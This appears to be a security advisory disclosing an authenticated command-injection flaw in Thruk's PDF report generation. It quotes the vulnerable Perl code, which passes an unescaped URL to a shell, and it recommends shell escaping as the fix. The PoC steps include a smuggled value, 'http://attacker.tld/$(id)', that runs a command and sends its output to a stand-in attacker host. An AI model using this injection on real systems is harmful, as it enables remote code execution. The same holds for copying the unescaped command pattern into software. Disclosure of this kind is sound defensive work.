Summary
Authenticated RCE in Thruk allows authorized users with network access to inject arbitrary commands via the URL parameter during PDF report generation.
Details
The Thruk web application does not properly process the url parameter when generating a PDF report. An authorized attacker with access to the reporting functionality could inject arbitrary commands that would be executed when the script /script/html2pdf.sh is called.
The vulnerability can be exploited by an authorized user with network access.
PoC
Steps to reproduce
Log in to the Thruk app
Open "Reports" > "Reporting" > "Create New Report"
Customize settings
Report Type - Report From Url
Direct PDF - Yes
Report from Url - http://attacker.tld/$(id)
Click "Regenerate Report" button
As a result, during the report generation process, the result of executing the id command will be sent to the attacker's website.
Vulnerable code fragment
|
my $url = $c->stash->{'param'}->{'url'}; |
|
|
|
# create fake session |
|
my($sessionid) = Thruk::Utils::get_fake_session($c); |
|
push @{$c->stash->{'report_tmp_files_to_delete'}}, $c->stash->{'fake_session_file'}; |
|
|
|
# directly convert external urls |
|
if($url =~ m/^https?:\/\/([^\/]+)/mx && $c->stash->{'param'}->{'pdf'} && $c->stash->{'param'}->{'pdf'} eq 'yes') { |
|
Thruk::Utils::External::update_status($ENV{'THRUK_JOB_DIR'}, 80, 'converting') if $ENV{'THRUK_JOB_DIR'}; |
|
my $cmd = $c->config->{home}.'/script/html2pdf.sh "'.$url.'" "'.$c->stash->{'attachment'}.'.pdf"'; |
|
local $ENV{THRUK_SESSION_ID} = $sessionid; |
|
Thruk::Utils::IO::cmd($cmd); |
my $url = $c->stash->{'param'}->{'url'};
[...]
if($url =~ m/^https?:\/\/([^\/]+)/mx && $c->stash->{'param'}->{'pdf'} && $c->stash->{'param'}->{'pdf'} eq 'yes') {
[...]
my $cmd = $c->config->{home}.'/script/html2pdf.sh "'.$url.'" "'.$c->stash->{'attachment'}.'.pdf"';
[...]
Thruk::Utils::IO::cmd($cmd);
Remediation
In this specific case, it would suffice to escape a string so that it can be used as a shell argument. When using the escape function, it is important to take precautions to avoid the possibility of shell commands being injected.
Acknowledgements
The vulnerability was discovered by Sergey Bobrov (Kaspersky, https://kaspersky.com/)
https://github.com/BlackFan
Impact
Remote Code Execution
Summary
Authenticated RCE in Thruk allows authorized users with network access to inject arbitrary commands via the URL parameter during PDF report generation.
Details
The Thruk web application does not properly process the url parameter when generating a PDF report. An authorized attacker with access to the reporting functionality could inject arbitrary commands that would be executed when the script /script/html2pdf.sh is called.
The vulnerability can be exploited by an authorized user with network access.
PoC
Steps to reproduce
As a result, during the report generation process, the result of executing the id command will be sent to the attacker's website.
Vulnerable code fragment
Thruk/plugins/plugins-available/reports2/lib/Thruk/Utils/Reports/Render.pm
Lines 385 to 396 in 4d01d50
Remediation
In this specific case, it would suffice to escape a string so that it can be used as a shell argument. When using the escape function, it is important to take precautions to avoid the possibility of shell commands being injected.
Acknowledgements
The vulnerability was discovered by Sergey Bobrov (Kaspersky, https://kaspersky.com/)
https://github.com/BlackFan
Impact
Remote Code Execution